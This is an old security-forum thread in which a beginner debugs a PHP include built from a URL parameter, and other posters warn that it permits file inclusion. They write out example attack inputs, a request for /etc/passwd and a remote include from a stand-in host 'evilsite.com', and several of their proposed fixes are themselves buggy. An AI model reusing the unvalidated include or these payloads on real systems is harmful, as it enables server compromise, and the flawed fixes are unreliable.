• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

easy php question - dynamic includes?

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Programming and More

View previous topic :: View next topic  
Author Message
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Sat Apr 19, 2003 11:45 am    Post subject: easy php question - dynamic includes? Reply with quote

i'm trying to do dynamic includes. i've looked at the manual, and googled for dynamic includes but i'm just not finding anything helpful or that explains why it isnt working.

i got a webpage
http://127.0.0.1:96/sociare/index.php?page=whatis

and the code:
Code:

    <? include($page.".php") ?>
   

but i get the error

Warning: Failed opening '.php' for inclusion (include_path='.;c:\php4\pear') in d:\wwwroot\sociare\index.php on line 17


i think this means it isnt resolving $page. a non-dynamic include earlier on the page works.

i was trying to find some helpful stuff on google on how to get stuff off the url. maybe i'm using the wrong search terms. i couldnt find it in the manual either.
i was kind of educated guessing i could just do $page. i read a bit of a php book once Wink

i'm sure this should be easy enough

cheers.
Back to top
View user's profile Send private message
Battery Powered
Just Arrived
Just Arrived


Joined: 10 Apr 2003
Posts: 0


Offline

PostPosted: Sat Apr 19, 2003 3:31 pm    Post subject: Reply with quote

Your code is about right, the only two things i can see wrong are:
your starting statement doesnt have 'php' in it, and
you havnt used ';' at the end

eg should be:
Code:
<?php include($page.".php"); ?>


the first bit, not having the 'php' can still work as im aware, but a good habbit to get into

(P.S - Your script isnt very secure atall, have you used an security measures anywhere else in the script?)

All the best,
B.P
Back to top
View user's profile Send private message
ThePsyko
SF Mod
SF Mod


Joined: 17 Oct 2002
Posts: 16777178
Location: California

Offline

PostPosted: Sat Apr 19, 2003 4:03 pm    Post subject: Reply with quote

Try
Code:
<?php include( $_GET['page'] .".php" ) ?>


Either that or enable Register Globals in the php.ini file... but it's better to get used to coding without it being enabled - otherwise if you move hosts or something, you run the risk of having to redo all your code
Back to top
View user's profile Send private message Send e-mail
Battery Powered
Just Arrived
Just Arrived


Joined: 10 Apr 2003
Posts: 0


Offline

PostPosted: Sat Apr 19, 2003 4:11 pm    Post subject: Reply with quote

Just to elaborate on the security side of the script,
since there is no validation being done on $page, anyone could call the script like this (assuming register_globals is on):
index.php?page=/etc/passwd

When a non PHP file is include()'d it's displayed as HTML/Text so won't be parsed, but even worse include() allows for including remote files, imagine:
index.php?page=http://evilsite.com/evil_script.php

evil_script.php could be anything the malicious user wanted, all it would have to do is echo out some PHP code for your script to receive, and it would be run right out of your script

The solution is to validate the input, eg:

Code:

$pages = array('whatis.php', 'whatisnt.php', 'what.php');

if( in_array($page, $pages) )
  {
    include($page.".php")
  }
else
  {
    die("Nice Try!!!");
  }

Or with ThePsyko's (better) way of doing it
Code:

$pages = array('whatis.php', 'whatisnt.php', 'what.php');

if( in_array($page, $pages) )
  {
    include( include( $_GET['page'] .".php" )
  }
else
  {
    die("Nice Try!!!");
  }



From what you've posted already its clear that your on a windows box, so the /etc/passwd example wouldnt directly apply for you but you get the jist, but if your going to upload the script to your webserver (and its on nix) the example should of made you shiver : ))
But without validation your leaving any file open

All the best,
B.P
Back to top
View user's profile Send private message
big tom
Forum Fanatic
Forum Fanatic


Joined: 28 May 2002
Posts: 16777215
Location: UK

Offline

PostPosted: Sat Apr 19, 2003 9:37 pm    Post subject: Reply with quote

or just
Code:
 
<?php
$page .= ".php";
include($page);
?>


Wink

of course you don't want any cross server scription going on, so add this in...
Code:

<?php
if (!$page) { $page = "start";}
$patern = "http://.+";
if (eregi($patern, $page)) {
$page = "start";
}
$page .= ".php";
include($page);
?>

Back to top
View user's profile Send private message
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Sun Apr 20, 2003 4:03 pm    Post subject: Reply with quote

still not working.
i simplified to
Code:

$page.=".php";
echo "page: ". $page;

and i get page: .php

using
Code:

<?php include( $_GET['page'] .".php" ) ?>

i get a strange error msg about T_INCLUDE

i was looking for my php.ini
i dont seem to have one on my c:drive. dunno how that happened.
could this be the reason?
can php work without a php.ini?
Back to top
View user's profile Send private message
big tom
Forum Fanatic
Forum Fanatic


Joined: 28 May 2002
Posts: 16777215
Location: UK

Offline

PostPosted: Sun Apr 20, 2003 4:11 pm    Post subject: Reply with quote

try just


$page .= ".php";
echo "page: $page";

personaly i don't see any need to use the dot to add the variable on the end.
Back to top
View user's profile Send private message
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Thu May 01, 2003 5:32 pm    Post subject: Reply with quote

ThePsyko wrote:
Try
Code:
<?php include( $_GET['page'] .".php" ) ?>


Either that or enable Register Globals in the php.ini file... but it's better to get used to coding without it being enabled - otherwise if you move hosts or something, you run the risk of having to redo all your code


i got it working using this at work, once i'd figured out the 'php' in <?php was necessary. Guess i should reinstall php at home Smile

cheers
Back to top
View user's profile Send private message
Irenaeus
Just Arrived
Just Arrived


Joined: 15 Apr 2003
Posts: 0
Location: nottm/leeds, england

Offline

PostPosted: Thu May 01, 2003 5:43 pm    Post subject: Reply with quote

i used to use this, stops people wandering off...

Code:

if($page){
  if(strstr('.', $page)) {
    include('./404.php');
  }elseif(!file_exists('./' . $page . '.php')) {
    include('./404.php');
  }else {
    include('./' . $page . '.php');
  }
}


Last edited by Irenaeus on Sat Jul 09, 2005 1:27 am; edited 1 time in total
Back to top
View user's profile Send private message Send e-mail MSN Messenger
dyn0
Just Arrived
Just Arrived


Joined: 21 Apr 2003
Posts: 0
Location: Leeds

Offline

PostPosted: Sun May 04, 2003 12:19 pm    Post subject: Reply with quote

Quote:
<?php
$page .= ".php";
include($page);
?>


The above code (as far as im aware) is slighty insecure because you could do www.somesite.com/somepage.php?page=/etc/passwd and such.
Back to top
View user's profile Send private message Visit poster's website MSN Messenger
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Sun May 04, 2003 6:14 pm    Post subject: Reply with quote

i'm running php on the abyss webserver from http://www.aprelium.com/ so there isnt a etc/password

i noticed the other day you can also run ASP using ActiveHTML from http://www.selisoft.com/en/ahtml/ which is free for personal use. i always thought the only other asp was chiliasp. but Sun seems to have bought that now.
Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Programming and More All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register